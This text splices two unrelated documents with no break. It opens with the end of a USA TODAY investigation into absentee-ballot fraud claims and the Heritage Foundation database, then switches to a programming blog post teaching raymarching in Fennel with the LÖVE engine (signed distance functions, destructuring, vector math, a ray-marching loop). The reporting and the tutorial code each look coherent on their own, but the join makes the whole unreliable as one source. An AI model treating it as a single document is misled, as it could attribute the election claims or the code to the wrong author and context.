Percy Gill’s re-election to the Wetumpka, Alabama town council the same year also prompted a rival to sue, and a civil judge also overturned the election because of defective absentee ballots. Gill died last year.

“I don’t know why they put him on the [Heritage] database,” said his friend Michael Jackson, the District Attorney for Alabama’s Fourth Judicial District. “He was a very honest man, an upstanding official.”

‘It wasn’t anything big to begin with’

The Heritage voter fraud database correctly notes that Miguel Hernandez was arrested as part of a larger voting fraud investigation in the Dallas area.

Hernandez, who pleaded guilty to improperly returning a marked ballot in a city council election, had knocked on voters’ doors, volunteered to request absentee ballots on their behalf, signed the requests under a forged name and then collected ballots for mailing.

A box of absentee ballots wait to be counted at the Albany County Board of Elections in Albany, N.Y. on June 30, 2020.

But Heritage did not include the fact that the investigation went nowhere. Voters told prosecutors their mailed votes were accurately recorded.

“It did not materialize into anything bigger simply because it wasn’t anything big to begin with,” said Andy Chatham, a former Dallas County assistant district attorney who helped prosecute Hernandez. “This was not a voter fraud case.”

Yet according to the Heritage Foundation’s fraud database, Hernandez’s scheme involved up to 700 ballots.

“Absolutely hilarious,” said Bruce Anton, Hernandez’s defense attorney. “There is no indication that anything like that was ever, ever considered.”

The legend of Hernandez’s activities grew even more when U.S. Attorney General William Barr recently held Hernandez out as an example of fraud, boosting the number of ballots. “We indicted someone in Texas, 1,700 ballots collected, he — from people who could vote, he made them out and voted for the person he wanted to.”

The Department of Justice had not indicted Hernandez. A spokeswoman told reporters Barr had been given inaccurate information.

Fraud exists, and the system to catch it works

While fewer and farther between, legitimate absentee fraud is also reflected in the database. Ben Cooper and 13 other individuals faced 243 felony charges in 2006 in what was described as Virginia’s worst election fraud in half a century. The mayor of tiny Appalachia, Cooper and his associates stole absentee ballots and bribed voters with booze, cigarettes and pork rinds so that they could repeatedly vote for themselves.

But the case is an example of just how difficult it is to organize and execute absentee fraud on a scale significant enough to swing an election while also avoiding detection. Heritage’s compilation of known absentee cases show the schemes repeatedly occurred in local races, frequently in smaller towns where political infighting can be fierce and fraudsters easily identified. Just one voter who told her story to The Roanoke Times unraveled Cooper’s ring.

The idea that absentee fraud frequently involves few votes and is easily caught is “laughable,” von Spakovsky said. He cited as an example the 1997 Miami mayoral race, which was riddled with absentee fraud.

However, that fraud scheme also quickly collapsed: The election took place in November, the Miami Herald began exposing the fraud in December, a civil trial started in February and a judge overturned the election in March.

“There have been some ham-handed attempts in small scale fraud, but I would be very surprised to see large scale efforts that go undetected,” Hasen said. “It is very hard to fly under the radar.”

The Heritage database also illustrates an aggressive system capable of catching and harshly punishing violators. When a Washington state woman registered her dog and put his paw print on an absentee ballot, she risked felony charges. Forging his ex-wife’s name on her ballot earned the former head of the Colorado Republican Party four years on probation.

“The mechanisms to safeguard the integrity of the vote are in place in every jurisdiction in the country,” said Chatham, the former Texas prosecutor. “Anybody who says differently hasn’t done the research that I have. They haven’t done the research at all and they just want to believe in conspiracy theories.”

USA TODAY Network reporters Zac Anderson, Joey Garrison, Jimmie Gates, Frank Gluck, Eric Litke, Brian Lyman, Will Peebles and Katie Sobko contributed to this report

EDITOR’S NOTE: This story is part of an ongoing investigation by Columbia Journalism Investigations, the PBS series FRONTLINE and USA TODAY NETWORK reporters that examines allegations of voter disenfranchisement and how the pandemic could impact turnout. It includes the film Whose Vote Counts, premiering on PBS and online Oct. 20 at 10 p.m. EST/9 p.m. CST.

This article originally appeared on USA TODAY: Trump’s absentee ballot fraud claims not supported by evidence


Raymarching with Fennel and LÖVE – Andrey Orst 


Previously I decided to implement a rather basic raycasting engine in ClojureScript.
It was a lot of fun and an interesting experience, and ClojureScript was awesome.
I implemented a small labyrinth game and thought about adding more features to the engine, such as camera shake and wall height changes.
But when I started working on these, I quickly realized that I'd rather move on to something more interesting, like a real 3D rendering engine that also uses rays.

Obviously, my first thought was to write a ray tracer.
This technique is widely known and has gained a lot of traction recently.
With native hardware support for ray tracing, a lot of games are using it, and there are plenty of tutorials teaching how to implement one.
In short, we cast a bunch of rays into 3D space and calculate their trajectories, determining what each ray hits and bounces off of.
Different materials have different bounce properties, and by tracing rays from the camera to the source of light, we can imitate illumination.
There are also a lot of different approaches to calculating bounces, e.g. for global illumination and ambient light, but I felt it was too complicated a task for a weekend post.
And unlike raycasting, most ray tracers require polygonal information in order to work, whereas raycasting only needs to know where a wall starts and ends.

I wanted a similar approach for 3D rendering, where we specify an object in terms of its mathematical representation.
For a sphere, we would just specify the coordinates of its center and a radius, and our rays would find intersection points with it, providing sufficient data to draw the sphere on screen.
And recently I read about a similar technique that uses rays for drawing on screen, but instead of casting infinite rays as in raycasting, it marches a ray forward in steps.
It also uses a special trick to make this process very efficient, which lets us use it for rendering real 3D objects.

I've decided to structure this post similarly to the one about raycasting, so this will be another long read, often more about Fennel than raymarching, but I promise that at the end we'll get something that looks like this:

So, just as with raycasting, the first thing we need to do is understand how a raymarching engine works on paper.

Raymarching basics

Raymarching can be illustrated similarly to raycasting, except that it requires more steps before we can render our image.
First, we need a camera and an object to look at:

Our first step would be to cast a ray; however, unlike with raycasting, we'll cast only a portion of a ray:

We then check whether the ray intersects the sphere.
It doesn't, so we take one more step:

It's still not intersecting, so we repeat again:

Oops – the ray overshot, and is now inside the sphere.
This is not a good outcome for us, as we want our rays to end exactly at the object's surface, without calculating an intersection point with the object itself.
We can fix this by casting a shorter ray:

However, this is very inefficient!
And besides, if we change the angle a bit or move the camera, we will overshoot again.
That means we'll either get an incorrect result or require a very small step size, which will blow up the computation cost.
How can we fix this?

Distance estimation

The solution to this is a signed distance function, also called a distance estimator.
Imagine we knew how far we were from the nearest object at any point in time.
That would mean we could shoot a ray of that length in any direction and still not hit anything.
Let’s add another object to the scene:

Now, let's draw two circles, which represent the distances from the objects to the point from which we'll cast rays:

We can see that there are two circles, and one is bigger than the other.
This means that if we choose the shortest safe distance, we can safely cast a ray in any direction and not overshoot anything.
For example, let's cast a ray towards the square:

We can see that we haven't reached the square, but more importantly, we did not overshoot it.
Now we need to march the ray again – but what distance should it cover?
To answer this question, we take another distance estimate, this time from the ray's end to the objects in the scene:

Once again we choose the shorter distance and march towards the square, then take the distance again, and repeat the whole process:

You can see that with each step the distance to the object becomes smaller, and thus we will never overshoot it.
However, this also means that we would take a lot of really small steps before finally hitting the object exactly, if we ever do.
That is not a good idea: it is even more inefficient than using a fixed step, and it produces more accuracy than we really need.
So instead of marching until we hit the object exactly, we march just enough times – that is, until the distance to the object is so small that there's no real point in continuing, since it is clear we will hit the object soon.
But this also means that if a ray passes near the edge of an object, we perform a lot of expensive distance estimations.

Here's a ray that runs parallel to the side of the square and marches towards the circle:

We do a lot of seemingly pointless measurements, and if the ray were closer to the square's side, we would take even more steps.
On the other hand, since we've already computed this data, we can use it to render effects such as glow or ambient occlusion.
But more on this later.

Once a ray hits an object, we have all the data we need.
Each ray represents a point on the screen, and the more rays we cast, the higher the resolution of our image will be.
And since we're not using triangles to represent objects, our spheres will always be smooth no matter how close we get, because there are no polygons involved.
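The whole loop we just walked through – ask the scene for the minimum safe distance, advance the ray by exactly that amount, stop when the distance gets small enough or the ray escapes – can be sketched in a few lines. Here is a rough, language-neutral illustration in Python (we'll build the real thing in Fennel below; all names here are made up for illustration):

```python
import math

def sphere_sdf(center, radius, point):
    # Signed distance to a sphere: distance to the center minus the radius.
    return math.dist(center, point) - radius

def march(origin, direction, scene_sdf, max_steps=100, hit_eps=0.001, max_dist=1000.0):
    # Sphere tracing: advance the ray by the scene's minimum distance each step.
    travelled = 0.0
    for _ in range(max_steps):
        point = tuple(o + d * travelled for o, d in zip(origin, direction))
        dist = scene_sdf(point)
        if dist < hit_eps:        # close enough: treat it as a hit
            return travelled
        travelled += dist         # safe to advance this far in any direction
        if travelled > max_dist:  # the ray escaped the scene
            break
    return None                   # no hit

# A unit sphere 5 units in front of the origin; the ray hits it after 4 units.
hit = march((0, 0, 0), (1, 0, 0), lambda p: sphere_sdf((5, 0, 0), 1, p))
```

Each iteration costs one distance evaluation, which is why grazing rays – like the one running along the square's edge above – are the expensive case.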

This is basically it.
Raymarching is quite a simple concept, just like raycasting, although it's a bit more involved, as we now have to compute things in 3D space.
So let's begin implementing it by installing the required tools and setting up the project.

Project structure

As you know from the title, we will use two main tools to create our raymarcher: LÖVE, a free game engine, and the Fennel programming language.
I chose Fennel because it is a Lisp-like language that compiles to Lua, and I'm quite a fan of Lisps.
But we also need somewhere to draw, and I know of no GUI toolkit for Lua.
There is, however, LÖVE – a game engine that runs Lua code, is capable of running on all major systems, and is thus a perfect candidate for our task.

Installation steps may differ per operating system, so please refer to the relevant manuals.
At the time of writing this post I'm using Fedora GNU/Linux, so for me this means:

$ sudo dnf install love luarocks readline-devel
$ luarocks install --local fennel
$ luarocks install --local readline # requires readline-devel
$ export PATH="$PATH:$HOME/.luarocks/bin"

It's better to permanently add $HOME/.luarocks/bin (or another path, if your installation differs) to the PATH variable in your shell, in order to be able to use the installed utilities without specifying the full path every time.
You can test whether everything is installed correctly by running fennel in your command line:

$ fennel
Welcome to Fennel 0.5.0 on Lua 5.3!
Use (doc something) to view documentation.
>> (+ 1 2 3)
6
>>

For other distributions the installation steps may vary, and on Windows I think it's safe to skip the readline part – it is fully optional, but makes editing in the REPL a bit more comfortable.

Once everything is installed, let’s create the project directory, and the main.fnl file, where we will write our code.

$ mkdir love_raymarching
$ cd love_raymarching
$ touch main.fnl

And that’s it!
We can test if everything works by adding this code to main.fnl:

(fn love.draw []
  (love.graphics.print "It works!"))

Now we can compile it with fennel --compile main.fnl > main.lua, thus producing the main.lua file, and run love . (the dot is intentional – it indicates the current directory).

A window should appear with the white text It works! in the upper left corner:

Now we can begin implementing our raymarcher.

Scene setup

Just as in the raycaster, we need a camera that will shoot rays, and some objects to look at.
Let's begin by creating a camera object that will store coordinates and rotation information.
We can do so by using var to declare a variable that is local to our file and that we can later change with set:

(var camera {:pos [0.0 0.0 0.0]
             :x-rotate 0.0
             :z-rotate 0.0})

For those unfamiliar with Lisps, and especially Clojure, let me quickly explain what this syntax is.
If you know this stuff, feel free to skip this part.

We start with the var special form, which binds a value to a name like this: (var name value).
So if we start the REPL using the fennel command in the shell and write (var a 40), a new variable a will be created.
We can then check that it has the desired value by typing a and pressing return:

We can then alter the contents of this variable using the set special form, which works as (set name new-value):

>> (set a (+ a 2))
>> a
42

Now to the curly and square brackets.
Everything enclosed in curly braces is a hashmap.
We can use any Lua value as a key, and the most common choice is a string, but Fennel has additional syntax for defining keys – a colon followed by a word: :a.
This is called a keyword, and in Fennel it is essentially the same as "a", except that we don't need to write a pair of quotes.
However, keywords can't contain spaces and certain other characters.

So writing {:a 0 :b 2 :c :hello} in the REPL will make a new table that holds three key-value pairs, which we can later read with another piece of syntax – the dot ..
Combining it with var, we can see that it works:

>> (var m {:a 1 :b 2 :c :hello})
>> (. m :b)
2

There's also a shorthand for this syntax: we can type m.b to access the :b key's value:

Notice that even though we’ve specified the value for :c as :hello, the REPL printed it to us as "hello".

We're left with the square brackets now, and those denote a plain vector.
It can grow and shrink, and it can store any Lua values:

>> [0 :a "b c" (fn [x] x)]
[0 "a" "b c" #<function: 0x56482230e090>]

However, Lua doesn't really have vectors or arrays – it uses tables for this, with keys that are simply indexes.
So the code above is equivalent to this Fennel expression: {1 0 2 "a" 3 "b c" 4 (fn [x] x)}, but we can use square brackets for convenience.

Note that we can combine indexed tables (vectors) and ordinary tables (hashmaps).
We can do it as shown above, by specifying indexes as keys, or by defining a vector var and setting a key in it to some value:

>> (var v [0 1 :a])
>> (set v.a 3)
>> v
{:a 3
 1 0
 2 1
 3 "a"}

So camera is essentially a Lua table that stores the keys :pos, :x-rotate, and :z-rotate, each holding a respective value.
We use a vector for our position and two floats for our rotation angles.
Now we can make objects, but before that, we need a scene to store them:

(var scene [])

Yep, that's our scene.
Nothing fancy – simply an empty vector to which we will later add objects.

Now we can create these objects, so let’s start with perhaps the simplest one – a sphere.
And I’ll also briefly explain what makes raymarching different from other methods of creating 3D graphics.

Creating objects

What is a sphere?
That depends on the domain we're working in.
Let's open up Blender, remove the default cube, and create a sphere with Shift+a, Mesh, UV Sphere:

To me, this looks nothing like a sphere, because it consists of rectangles.
However, if we subdivide the surface, we get a more accurate representation:

This looks more like a sphere, but this is still just an approximation.
Theoretically, if we move very close to it, we will see the edges and corners, especially with flat shading.
Also, each subdivision adds more points, and it gets more and more expensive to compute:

We have to make these trade-offs because we don't need very accurate spheres when we need real-time processing.
But raymarching doesn't have this limitation, because a sphere in raymarching is defined by a center point and a radius, which we can then work with using a signed distance function.

So let's create a function that will produce a sphere:

(fn sphere [radius pos color] ➊
  (let [[x y z] ➋ (or pos [0 0 0])
        [r g b] (or color [1 1 1])]
    {:radius (or radius 5)
     :pos [(or x 0) (or y 0) (or z 0)]
     :color [(or r 0) (or g 0) (or b 0)]
     :sdf sphere-distance ➌}))

There’s a lot of stuff going on, so let’s dive into it.

This is a so-called constructor – a function that takes some parameters, constructs an object with those parameters applied, and returns it.
In most typed languages we would define a class or a structure to represent this object; in Fennel (and hence in Lua) we can just use a table.
And this is my favorite part of such languages.

So we used the fn special form to create a function named sphere that takes three parameters: radius, position in space pos, and color ➊.
Then we see another special form, let.
It is used to introduce locally scoped variables, and it has another nice property – destructuring ➋.

Let’s quickly understand how let works in this case.
If you know how destructuring works, you can skip this part.

Here’s a simple example:

>> (let [a 1
         b 2]
     (+ a b))
3

We’ve introduced two local variables a and b, which hold values 1 and 2 respectively.
Then we’ve computed their sum and returned it as a result.

This is good, but what if we wanted to compute a sum of three vector elements multiplied by b?
Let’s put a vector into a:

>> (let [a [1 2 3]
         b 2]
     <???>)

There are many ways to do this, such as reducing over the vector with a function that sums the elements, or reading values from the vector in a loop and accumulating them in a local variable.
However, in our project we always know exactly how many elements there will be, so we can just take them out by index without any kind of loop:

>> (let [a [1 2 3]
         b 2
         a1 (. a 1)
         a2 (. a 2)
         a3 (. a 3)]
     (* (+ a1 a2 a3) b))
12

Yet this is very verbose, and not really good.
We can make it a bit less verbose by skipping the local variable definitions and using the values directly in the sum:

>> (let [a [1 2 3]
         b 2]
     (print (.. "value of second element is " (. a 2)))
     (* (+ (. a 1) (. a 2) (. a 3)) b))
value of second element is 2
12

However, again, this isn't great, as we have to repeat the same syntax three times – and what if we want to use the second value from the vector in several places?
Here, for example, I've added a print because I particularly care about the second element's value and want to see it in the log, but I have to repeat myself and fetch the second element twice.
We could use a local binding for this, but we don't want to do it manually.

That's where destructuring comes in handy – and trust me, it is a very handy thing.
We can specify a pattern that is applied to our data and binds variables for us, like this:

>> (let [[a1 a2 a3] [1 2 3]
         b 2]
     (print (.. "value of second element is " a2))
     (* (+ a1 a2 a3) b))
value of second element is 2
12

Which works somewhat like this:

[1  2  3]
 ↓  ↓  ↓
[a1 a2 a3]

This is much shorter than any of the previous examples, and it allows us to use any of the vector's values in several places.

We can also destructure maps like this:

>> (var m {:a-key 1 :b-key 2})
>> (let [{:a-key a
          :b-key b} m]
     (+ a b))
3

And this also has a shorthand for when the name of the key and the name of the desired local binding match:

>> (var m {:a 1 :b 2})
>> (let [{: a : b} m]
     (+ a b))
3

Which is even shorter.

All this essentially boils down to this kind of Lua code:

-- vector destructuring
-- (let [[a b] [1 2]] (+ a b))
local _0_ = {1, 2}
local a = _0_[1]
local b = _0_[2]
return (a + b)

-- hashmap destructuring
-- (let [{: a : b} {:a 1 :b 2}] (+ a b))
local _0_ = {a = 1, b = 2}
local a = _0_["a"]
local b = _0_["b"]
return (a + b)

This is nothing special really, but it still shows the power of Lisp's macro system, in which destructuring is implemented.
And it gets really cool when we use destructuring in function forms, as we will see later.

If we were to call (sphere) now, we would get an error, because at ➌ we specified a value for the :sdf key that doesn't exist yet.
SDF stands for Signed Distance Function.
That is, a function that returns the distance from a given point to an object.
The distance is positive when the point is outside the object, and negative when the point is inside it.

Let’s define an SDF for a sphere.
What's great about spheres is that to compute the distance to a sphere's surface, we only need to compute the distance to the sphere's center and subtract the sphere's radius from it.
Let’s implement this:

(local sqrt math.sqrt) ➊

(fn sphere-distance [{:pos [sx sy sz] : radius} [x y z]] ➋
  (- (sqrt (+ (^ (- sx x) 2) (^ (- sy y) 2) (^ (- sz z) 2)))
     radius))

For performance reasons we declare math.sqrt as a local variable sqrt that holds the function value, to avoid a repeated table lookup.

As was later pointed out, LuaJIT does optimize such calls, and there is no repeated lookup for method calls.
This is still true for plain Lua, though, so I'm going to keep this as is, but you can skip all these local definitions if you want and use the methods directly.

And at ➋ we again see destructuring – not in a let block this time, but in the function argument list.
What essentially happens here is this: the function takes two parameters, the first of which is a hashmap that must have a :pos key associated with a vector of three numbers, and a :radius key with a value.
The second parameter is simply a vector of three numbers.
We immediately destructure these parameters into a set of variables local to the function body.
The hashmap is destructured into the sphere's position vector, which is itself immediately destructured into sx, sy, and sz, and a radius variable storing the sphere's radius.
The second parameter is destructured into x, y, and z.
We then compute the resulting value using the formula above.
Note that Fennel and Lua only understand definitions in top-to-bottom order, so we need to define sphere-distance before sphere.

Let’s test our function by passing several points and a sphere of radius 5:

>> (sphere-distance (sphere 5) [5 0 0])
0.0
>> (sphere-distance (sphere 5) [0 15 0])
10.0
>> (sphere-distance (sphere 5) [0 0 0])
-5.0

Great!
First we check that we're on the sphere's surface, because the radius of our sphere is 5 and we've set the x coordinate to 5 as well.
Next we check that we're 10 units away from the surface, and lastly we check that we're inside the sphere, since the sphere's center and our point are both at the origin.

But we can also call this function as a method, using the : syntax:

>> (local s (sphere))
>> (s:sdf [0 0 0])
-5

This works because methods in Lua are syntactic sugar.
When we write (s:sdf p), it is essentially equal to (s.sdf s p), and our distance function takes the sphere as its first parameter, which allows us to use the method syntax.
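If the colon sugar feels unfamiliar, Python happens to follow the very same rule: a method call is just a function call with the object passed as the first argument. Here is a small illustrative sketch (it mirrors, rather than reproduces, our Fennel sphere):

```python
class Sphere:
    def __init__(self, radius=5):
        self.radius = radius

    def sdf(self, point):
        # Distance from `point` to the surface of a sphere centered at the origin.
        x, y, z = point
        return (x * x + y * y + z * z) ** 0.5 - self.radius

s = Sphere()
# Method syntax and the explicit "pass the object first" form are equivalent,
# just like (s:sdf p) and (s.sdf s p) in Fennel/Lua.
assert s.sdf((0, 0, 0)) == Sphere.sdf(s, (0, 0, 0)) == -5.0
```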

Now we need a distance estimator – a function that computes the distances to all objects and returns the shortest one, so we can then safely extend our ray by that amount.

(local DRAW-DISTANCE 1000)

(fn distance-estimator [point scene]
  (var min DRAW-DISTANCE)
  (var color [0 0 0])
  (each [_ object (ipairs scene)]
    (let [distance (object:sdf point)]
      (when (< distance min)
        (set min distance)
        (set color (. object :color)))))
  (values min color))

This function computes the distance from the given point to each object in the scene using our signed distance functions, and picks the minimum distance along with the color of the closest object.
Even though it makes little sense to return a color from distance-estimator, we do it here because we don't want to repeat the whole process later just to get the color at the endpoint.

Let’s check if this function works:

>> (distance-estimator [5 4 0] [(sphere) (sphere 2 [5 7 0] [0 1 0])])
1.0     [0 1 0]

It works: we obtained the distance to the second sphere, and its color, because the point we specified was closer to this sphere than to the other.

With the camera, an object, a scene, and this function, we have all we need to start shooting rays and rendering them on screen.

Marching ray

Just as in the raycaster, we cast rays from the camera, but now we do it in 3D space.
In raycasting, our horizontal resolution was specified by the number of rays, and our vertical resolution was basically infinite.
For 3D this is not an option, so our resolution now depends on a 2D grid of rays instead of a 1D row.

Quick math.
How many rays will we need to cast in order to fill up 512 by 448 pixels?
The answer is simple – multiply the width by the height, and here's the number of rays you'll need:

A stunning 229376 rays to march.
And each ray has to perform many distance estimations as it marches away from its origin.
Suddenly, all those micro-optimizations, like locals for functions, don't feel so unnecessary.
Let's hope for the best, and that LÖVE will handle real-time rendering.
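That ray budget is just width times height – one ray per pixel. As a quick sanity check (the helper name here is mine, purely for illustration):

```python
def ray_count(width, height):
    # One ray is marched per screen pixel.
    return width * height

print(ray_count(512, 448))  # prints 229376
```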
We can begin by creating a function that marches a single ray in the direction our camera looks.
But first, we need to define what we will use to specify coordinates, directions, and so on in our 3D space.

My first attempt was to use spherical coordinates to define the ray direction, and to move points in 3D space relative to the camera.
However, it had a lot of problems, especially when looking at objects at angles other than 90 degrees.
Like here’s a screenshot of me looking at the sphere from the “front”:

And here’s when looking from “above”:

And when I added a cube object, I noticed a slight fish-eye distortion effect:

Which was not great at all.
So I decided to redo everything with vectors and make a proper camera with a “look-at” point, a computed projection plane, and so on.

And to do this we need to be able to work with vectors – add them, multiply them, normalize them, etc.
I wanted to refresh my knowledge of this topic, so I decided not to use any existing vector library, and to implement everything from scratch.
It’s not that hard.
Especially since we already have vectors in the language, and can destructure them into variables with ease.

So we need these basic functions:

  • vec3 – a constructor with some handy semantics,
  • vec-length – a function that computes the magnitude of a vector,
  • arithmetic functions, such as vec-sub, vec-add, and vec-mul,
  • and other unit-vector functions, mainly norm, dot, and cross.

Here’s the source code of each of these functions:

(fn vec3 [x y z]
  (if (not x) [0 0 0]
      (and (not y) (not z)) [x x x]
      [x y (or z 0)]))

(fn vec-length [[x y z]]
  (sqrt (+ (^ x 2) (^ y 2) (^ z 2))))

(fn vec-sub [[x0 y0 z0] [x1 y1 z1]]
  [(- x0 x1) (- y0 y1) (- z0 z1)])

(fn vec-add [[x0 y0 z0] [x1 y1 z1]]
  [(+ x0 x1) (+ y0 y1) (+ z0 z1)])

(fn vec-mul [[x0 y0 z0] [x1 y1 z1]]
  [(* x0 x1) (* y0 y1) (* z0 z1)])

(fn norm [v]
  (let [len (vec-length v)
        [x y z] v]
    [(/ x len) (/ y len) (/ z len)]))

(fn dot [[x0 y0 z0] [x1 y1 z1]]
  (+ (* x0 x1) (* y0 y1) (* z0 z1)))

(fn cross [[x0 y0 z0] [x1 y1 z1]]
  [(- (* y0 z1) (* z0 y1))
   (- (* z0 x1) (* x0 z1))
   (- (* x0 y1) (* y0 x1))])

Since we already know how destructuring works, it’s not hard to see what these functions do.
vec3, however, has some logic in it, and you can notice that the if has three outcomes.
if in Fennel is more like cond in other lisps, which means that we can specify as many else-if clauses as we want.

Therefore, calling it without arguments produces a zero-length vector [0 0 0].
If called with one argument, it returns a vector where each coordinate is set to this argument: (vec3 3) will produce [3 3 3].
Otherwise, z is either specified or not, so we can simply create a vector with x, y, and either z or 0.
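We can check each branch in the REPL:

```fennel
>> (vec3)
[0 0 0]
>> (vec3 3)
[3 3 3]
>> (vec3 1 2)
[1 2 0]
```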

You may wonder why these are defined as plain functions, and why I didn’t implement operator overloading so we could simply use + or * to compute values.
I tried this; however, it is extremely slow, since every operation has to do a metatable lookup.

Here’s a quick benchmark:

(macro time [body]
  `(let [clock# os.clock
         start# (clock#)
         res# ,body
         end# (clock#)]
     (print (.. "Elapsed " (* 1000 (- end# start#)) " ms"))
     res#))

;; operator overloading
(var vector {})
(set vector.__index vector)

(fn vec3-meta [x y z]
  (setmetatable [x y z] vector))

(fn vector.__add [[x1 y1 z1] [x2 y2 z2]]
  (vec3-meta (+ x1 x2) (+ y1 y2) (+ z1 z2)))

(local v0 (vec3-meta 1 1 1))
(time (for [i 0 1000000] (+ v0 v0 v0 v0)))

;; basic functions
(fn vec3 [x y z]
  [x y z])

(fn vector-add [[x1 y1 z1] [x2 y2 z2]]
  (vec3 (+ x1 x2) (+ y1 y2) (+ z1 z2)))

(local v1 (vec3 1 1 1))
(time (for [i 0 1000000] (vector-add (vector-add (vector-add v1 v1) v1) v1)))

If we run it with the Lua interpreter, we’ll see the difference:

$ fennel --compile test.fnl | lua
Elapsed 1667.58 ms
Elapsed 1316.078 ms

Testing this with LuaJIT suggests that the metatable way is actually faster; however, I experienced a major slowdown in the renderer – everything ran about 70% slower, according to the frames-per-second count.
So functions are okay, even though they are much more verbose.

Now we can define a march-ray function:

(fn move-point [point dir distance] ➊
  (vec-add point (vec-mul dir (vec3 distance))))

(local MARCH-DELTA 0.0001)
(local MAX-STEPS 500)

(fn march-ray [origin direction scene]
  (var steps 0)
  (var distance 0)
  (var color nil)

  (var not-done? true) ➋
  (while not-done?
    (let [➍ (new-distance
              new-color) (-> origin
                             (move-point direction distance)
                             (distance-estimator scene))]
      (when (or (< new-distance MARCH-DELTA)
                (>= distance DRAW-DISTANCE)
                (> steps MAX-STEPS) ➌)
        (set not-done? false))
      (set distance (+ distance new-distance))
      (set color new-color)
      (set steps (+ steps 1))))
  (values distance color steps))

Not much, but we have some things to discuss.

First, we define a function that moves a point in 3D space ➊.
It accepts a point, which is a three-dimensional vector, a direction vector dir, which must be normalized, and a distance.
We then multiply the direction vector by a vector whose components are all set to the distance, and add the result to the point.
Simple and easy.
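A quick check in the REPL, using the vector functions from above:

```fennel
>> (move-point [0 0 0] [1 0 0] 5)
[5 0 0]
```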

Next we define several constants, and the march-ray function itself.
It defines some local vars that hold initial values, and uses a while loop to march the given ray enough times.
You can notice that at ➋ we create a not-done? var that holds true, and then use it as the while loop’s test.
And you can also notice that at ➌ we have a condition upon which we set not-done? to false and exit the loop.
So you may wonder, why not use a for loop instead?
Lua supports index-based for loops.
Fennel also has support for these.
So why use while with a variable?

Because Fennel has no break special form for some reason.

Here’s a little rant.
You can skip it if you’re not interested in me making unconfirmed inferences about Fennel :).

I think that Fennel doesn’t support break because Fennel is influenced by Clojure (correct me if I’m wrong), and Clojure doesn’t have break either.
However, looping in Clojure is a bit more controllable, as we choose when we want to go to the next iteration:

(loop [i 0]
  ;; do stuff
  (when (< i 10)
    (recur (+ i 1))))

Which means: while i is less than 10, perform another iteration.

In Fennel, however, the concept isn’t quite like this, because we have to define a var explicitly, and put it into while test position:

(var i 0)
(while (< i 10)
  ;; do stuff
  (set i (+ i 1)))

You may not see the difference, but I do.
This can also be trivially expressed as a for loop: (for [i 0 10] (do-stuff)).
However, not every construct can be expressed as a for loop when we don’t have break.
And in Clojure we don’t have to declare a variable outside the loop, since loop does it for us – but the biggest difference is here:

(loop [i 0]
  (when (and (< i 100)
             (< (some-foo) 1000))
    (recur (inc i))))

Notice that we’re looping until i reaches 100, or until some-foo returns something greater than 1000.
We can easily express this as for loop in Lua:

for i = 0, 100 do
   if some_foo() > 1000 then
      break
   end
end

However, we can’t do the same in Fennel, because there’s no break.
In this case we can work around it by defining an i var, putting both conditions into the while loop test, and incrementing i in the body, like this:

(var i 0)
(while (and (< i 100)
            (< (some-foo) 1000))
  (set i (+ i 1)))

Which is almost like the Clojure example, and you may wonder why I complain – but in the case of the march-ray function we can’t do this either!
That’s because the function we call returns multiple values, which we need to destructure ➍ in order to test them.
Or in some loops such a function may depend on the context of the loop, so it has to be inside the loop body, not in the test.

So not having break, or the ability to control when to go to the next iteration, is a serious disadvantage.
Yes, Clojure’s recur is also limited, since it must be in tail position, so you can’t use it as continue or something like that.
But it’s still a somewhat more powerful construct.
I’ve actually thought about writing a loop macro, but it seems that it’s not as easy to do in Fennel as in Clojure, because Fennel lacks some built-in functions for manipulating sequences.
I mean, it’s totally doable, but requires way too much work compared to defining a Boolean var and setting it in the loop.

At ➍ we see syntax that I haven’t covered before: (let [(a b) (foo)] ...).
Many of us who are familiar with Lisp, and especially Racket, may be confused.
You see, in Racket and other Scheme implementations (that allow using different kinds of parentheses), let has this kind of syntax:

(let [(a 1)   ;; In Scheme square brackets around bindings
      (b 41)] ;; are replaced with parentheses
  (+ a b))

Or more generally, (let ((name1 value1) (name2 value2) ...) body).
However, in the case of the march-ray function, we see a similar form, except the second element has no value specified.
This is again valid syntax in some lisps (Common Lisp, for example), as we can make a binding that holds nothing and set it later – but that is not what happens in this code, as we don’t use foo at all:

(let [(a b) (foo)]
  (+ a b))

And since in Fennel we don’t need parentheses, and simply specify bindings as a vector [name1 value1 name2 value2 ...], another possible confusion may arise.
You may think that (a b) is a function call that returns a name, and (foo) is a function call that produces a value.
But then we somehow use a and b.
What is happening here?

But this is just another kind of destructuring available in Fennel.

Lua has one universal data structure, called a table.
However, Lua doesn’t have any special syntax for destructuring, so when a function needs to return several values, you have two options.
First, you can return a table:

function returns_table(a, b)
   return {a, b}
end

But the user of such a function will have to get the values out of the table themselves:

local res = returns_table(1, 2)
local a, b = unpack(res) -- or use indexes, e.g. local a = res[1]
print("a: " .. a .. ", b: " .. b)
-- a: 1, b: 2

But this is extra work, and it ties the values together into a data structure, which may not be what you want.
So Lua has a shorthand for this – you can return multiple values:

function returns_values(a, b)
   return a, b
end

local a, b = returns_values(1, 2)
print("a: " .. a .. ", b: " .. b)
-- a: 1, b: 2

This is shorter and more concise.
Fennel also supports this multivalue return with the values special form:

(fn returns-values [a b]
  (values a b))

This is equivalent to the previous code, but how do we use these values?
All binding forms in Fennel support destructuring, so we can write this as:

(local (a b) (returns-values 1 2))
(print (.. "a: " a ", b: " b))
;; a: 1, b: 2

The same can be done with vectors or maps when defining local, var, or global variables:

(local [a b c] (returns-vector)) ;; returns [1 2 3]
(var {:x x :y y :z z} (returns-map)) ;; returns {:x 1 :y 2 :z 3}
(global (bar baz) (returns-values)) ;; returns (values 1 2)

And all of this works in let or when defining a function!
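For instance, here’s a small sketch: the returns-values function from above destructured directly in a let, and a sequence destructured right in a function’s argument list (print-sum is a hypothetical helper, not part of the renderer):

```fennel
(fn returns-values [a b]
  (values a b))

;; destructuring multiple values in a let
(let [(a b) (returns-values 1 2)]
  (print (+ a b))) ;; prints 3

;; destructuring a sequence in a function argument list
(fn print-sum [[x y z]]
  (print (+ x y z)))

(print-sum [1 2 3]) ;; prints 6
```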

OK.
We’ve defined a function that marches a ray, now we need to shoot some!

Shooting rays

As with math functions, let’s define some local definitions somewhere at the top of the file:

(local love-points love.graphics.points)
(local love-dimensions love.graphics.getDimensions)
(local love-set-color love.graphics.setColor)
(local love-key-pressed? love.keyboard.isDown)
(local love-get-joysticks love.joystick.getJoysticks)

This is pretty much all we’ll need from LÖVE – two functions to draw colored pixels, one function to get the resolution of the window, and input-handling functions for keyboard and gamepad.
